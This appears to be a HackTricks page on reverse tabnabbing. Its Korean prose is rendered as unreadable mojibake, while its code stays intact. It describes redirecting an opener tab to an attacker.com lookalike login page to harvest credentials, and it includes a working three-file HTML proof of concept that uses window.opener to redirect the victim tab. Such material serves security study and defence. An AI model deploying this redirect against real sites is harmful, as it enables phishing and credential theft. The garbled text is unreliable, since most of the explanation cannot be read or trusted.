Tip
AWS ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:HackTricks Training GCP Red Team Expert (GRTE)
Azure ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks μ§μνκΈ°
- ꡬλ κ³ν νμΈνκΈ°!
- **π¬ λμ€μ½λ κ·Έλ£Ή λλ ν λ κ·Έλ¨ κ·Έλ£Ήμ μ°Έμ¬νκ±°λ νΈμν° π¦ @hacktricks_liveλ₯Ό νλ‘μ°νμΈμ.
- HackTricks λ° HackTricks Cloud κΉνλΈ λ¦¬ν¬μ§ν 리μ PRμ μ μΆνμ¬ ν΄νΉ νΈλ¦μ 곡μ νμΈμ.
μ€λͺ
곡격μκ° νΌν΄μκ° ν΄λ¦ν <a νκ·Έμ href μΈμλ₯Ό μ μ΄ν μ μλ μν©μμ, 곡격μλ μ΄ λ§ν¬λ₯Ό μμ μ μ μ΄ νμ μλ μΉ(μ
μ± μΉμ¬μ΄νΈ)μΌλ‘ μ§μ ν©λλ€. κ·Έλ° λ€μ, νΌν΄μκ° λ§ν¬λ₯Ό ν΄λ¦νκ³ κ³΅κ²©μμ μΉμ¬μ΄νΈμ μ κ·Όνλ©΄, μ΄ μ
μ± μΉμ¬μ΄νΈλ μλ°μ€ν¬λ¦½νΈ κ°μ²΄ **window.opener**λ₯Ό ν΅ν΄ μλ νμ΄μ§λ₯Ό μ μ΄ν μ μμ΅λλ€.
νμ΄μ§μ **rel="opener"**κ° μμ§λ§ target="_blank"κ° ν¬ν¨λμ΄ μκ³ rel="noopener"κ° μμΌλ©΄, λν μ·¨μ½ν μ μμ΅λλ€.
μ΄ νλμ μ
μ©νλ μΌλ°μ μΈ λ°©λ²μ window.opener.location = https://attacker.com/victim.htmlμ ν΅ν΄ μλ μΉμ μμΉλ₯Ό 곡격μκ° μ μ΄νλ μΉμΌλ‘ λ³κ²½νλ κ²μ
λλ€. μ΄ μΉμ μλ μΉμ¬μ΄νΈμ²λΌ 보μ΄λλ‘ νμ¬ μλ μΉμ¬μ΄νΈμ λ‘κ·ΈμΈ μμμ λͺ¨λ°©νκ³ μ¬μ©μμκ² μ격 μ¦λͺ
μ μμ²ν μ μμ΅λλ€.
κ·Έλ¬λ 곡격μκ° μ΄μ μλ μΉμ¬μ΄νΈμ μλμ° κ°μ²΄λ₯Ό μ μ΄ν μ μμΌλ―λ‘, κ·Έλ μ΄λ₯Ό λ€λ₯Έ λ°©μμΌλ‘ μ μ©νμ¬ μλ°ν 곡격μ μνν μ μμ΅λλ€(μλ§λ μλ°μ€ν¬λ¦½νΈ μ΄λ²€νΈλ₯Ό μμ νμ¬ κ·Έκ° μ μ΄νλ μλ²λ‘ μ 보λ₯Ό μ μΆν μ μκ² μ£ ?).
κ°μ
λ°± λ§ν¬κ° μλ κ²½μ°
μλ°© μμ±μ΄ μ¬μ©λμ§ μμ λ λΆλͺ¨ νμ΄μ§μ μμ νμ΄μ§ κ°μ λ§ν¬:

λ°± λ§ν¬κ° μλ κ²½μ°
μλ°© μμ±μ΄ μ¬μ©λ λ λΆλͺ¨ νμ΄μ§μ μμ νμ΄μ§ κ°μ λ§ν¬:

μμ
ν΄λμ λ€μ νμ΄μ§λ₯Ό μμ±νκ³ python3 -m http.serverλ‘ μΉ μλ²λ₯Ό μ€νν©λλ€.
κ·Έλ° λ€μ, μ κ·Ό http://127.0.0.1:8000/vulnerable.html, ν΄λ¦νμ¬ λ§ν¬λ₯Ό ν΄λ¦νκ³ μλ μΉμ¬μ΄νΈμ URLμ΄ λ³κ²½λλ κ²μ μ£Όλͺ©νμΈμ.
<!DOCTYPE html>
<html>
<body>
<h1>Victim Site</h1>
<a href="http://127.0.0.1:8000/malicious.html" target="_blank" rel="opener">Controlled by the attacker</a>
</body>
</html>
<!DOCTYPE html>
<html>
<body>
<script>
window.opener.location = "http://127.0.0.1:8000/malicious_redir.html";
</script>
</body>
</html>
<!DOCTYPE html>
<html>
<body>
<h1>New Malicious Site</h1>
</body>
</html>
Accessible properties
κ΅μ°¨ μΆμ² μ κ·Όμ΄ λ°μνλ μλ리μ€μμ, opener JavaScript κ°μ²΄ μ°Έμ‘°λ‘ μ§μΉλλ window JavaScript ν΄λμ€ μΈμ€ν΄μ€μ μμ±μ μ μμ μΈ μ¬μ΄νΈκ° μ κ·Όν μ μλ κ²μΌλ‘ μ νλ©λλ€:
opener.closed: μ΄ μμ±μ μ°½μ΄ λ«νλμ§ μ¬λΆλ₯Ό νμΈνκΈ° μν΄ μ κ·Όλλ©°, λΆλ¦¬μΈ κ°μ λ°νν©λλ€.opener.frames: μ΄ μμ±μ νμ¬ μ°½ λ΄μ λͺ¨λ iframe μμμ λν μ κ·Όμ μ 곡ν©λλ€.opener.length: νμ¬ μ°½μ μ‘΄μ¬νλ iframe μμμ μλ₯Ό μ΄ μμ±μ΄ λ°νν©λλ€.opener.opener: μ΄ μμ±μ ν΅ν΄ νμ¬ μ°½μ μ° μ°½μ λν μ°Έμ‘°λ₯Ό μ»μ μ μμ΅λλ€.opener.parent: μ΄ μμ±μ νμ¬ μ°½μ λΆλͺ¨ μ°½μ λ°νν©λλ€.opener.self: μ΄ μμ±μ νμ¬ μ°½ μ체μ λν μ κ·Όμ μ 곡ν©λλ€.opener.top: μ΄ μμ±μ κ°μ₯ μμμ λΈλΌμ°μ μ°½μ λ°νν©λλ€.
κ·Έλ¬λ λλ©μΈμ΄ λμΌν κ²½μ°, μ μμ μΈ μ¬μ΄νΈλ window JavaScript κ°μ²΄ μ°Έμ‘°μ μν΄ λ ΈμΆλ λͺ¨λ μμ±μ μ κ·Όν μ μμ΅λλ€.
Prevention
μλ°© μ 보λ HTML5 Cheat Sheetμ λ¬Έμνλμ΄ μμ΅λλ€.
References
Tip
AWS ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:HackTricks Training GCP Red Team Expert (GRTE)
Azure ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks μ§μνκΈ°
- ꡬλ κ³ν νμΈνκΈ°!
- **π¬ λμ€μ½λ κ·Έλ£Ή λλ ν λ κ·Έλ¨ κ·Έλ£Ήμ μ°Έμ¬νκ±°λ νΈμν° π¦ @hacktricks_liveλ₯Ό νλ‘μ°νμΈμ.
- HackTricks λ° HackTricks Cloud κΉνλΈ λ¦¬ν¬μ§ν 리μ PRμ μ μΆνμ¬ ν΄νΉ νΈλ¦μ 곡μ νμΈμ.


